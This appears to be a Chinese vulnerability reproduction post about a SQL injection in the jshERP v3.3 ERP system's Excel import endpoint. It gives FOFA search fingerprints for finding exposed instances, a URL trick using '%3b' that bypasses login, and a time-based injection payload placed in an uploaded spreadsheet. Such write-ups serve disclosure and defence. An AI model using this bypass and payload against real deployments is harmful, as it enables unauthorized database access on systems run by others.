jsherp importItemExcel接口存在SQL注入

一、漏洞简介

  • 很多人说管伊佳ERP(原名:华夏ERP,英文名:jshERP)是目前人气领先的国产ERP系统
  • 虽然目前只有进销存+财务+生产的功能,但后面将会推出ERP的全部功能,有兴趣请帮点一下

二、漏洞影响

css 复制代码
- jshERP v3.3
- OS:Windows/Linux/macOS
- Browser: Chrome、Firefox、Safair

三、网络测绘:

css 复制代码
fofa:
icon_hash="-1298131932"

指纹:
body="1cd9bcbaae133f03a6eb19da6579aaba"

四、复现过程

利用条件

(该接口需要登陆后才能访问,但是项目中的代码导致可以使用 "/jshERP-boot/doc.html/...%3b/depotItem/importItemExcel" 这样的url进行未授权访问)

首页

步骤 POC 1

构造或者抓取一个数据包,在 /depotItem/importItemExcel 接口处上传一个excel文件)

数据包

(其中的"C:\Users\hp\Desktop\test.xls"文件内容为)

cs 复制代码
'1') oR sleep(0.05)--

(发送数据包可以发现页面会有延迟)

(修改sleep函数时间,延迟发送变化,说明存在SQL注入)

相关推荐
网安小白的进阶之路11 分钟前
A模块 系统与网络安全 第四门课 弹性交换网络-2
网络·安全·web安全·系统安全·交换机
安全系统学习11 分钟前
网络安全之RCE分析与利用详情
服务器·网络·安全·web安全·系统安全
武汉唯众智创12 分钟前
网络安全实训室建设方案全攻略
网络·安全·web安全·网络安全·网络安全实训室·网络安全实验室
weixin_4723394612 分钟前
网络安全攻防:文件上传漏洞的深度解析与防御实践
安全·web安全
雪兽软件13 分钟前
2025 年网络安全与人工智能发展趋势
人工智能·安全·web安全
Hellyc1 小时前
基于模板设计模式开发优惠券推送功能以及对过期优惠卷进行定时清理
java·数据库·设计模式·rocketmq
lifallen1 小时前
Paimon LSM Tree Compaction 策略
java·大数据·数据结构·数据库·算法·lsm-tree
{⌐■_■}5 小时前
【Kafka】登录日志处理的三次阶梯式优化实践:从同步写入到Kafka多分区批处理
数据库·分布式·mysql·kafka·go
isNotNullX5 小时前
数据中台架构解析:湖仓一体的实战设计
java·大数据·数据库·架构·spark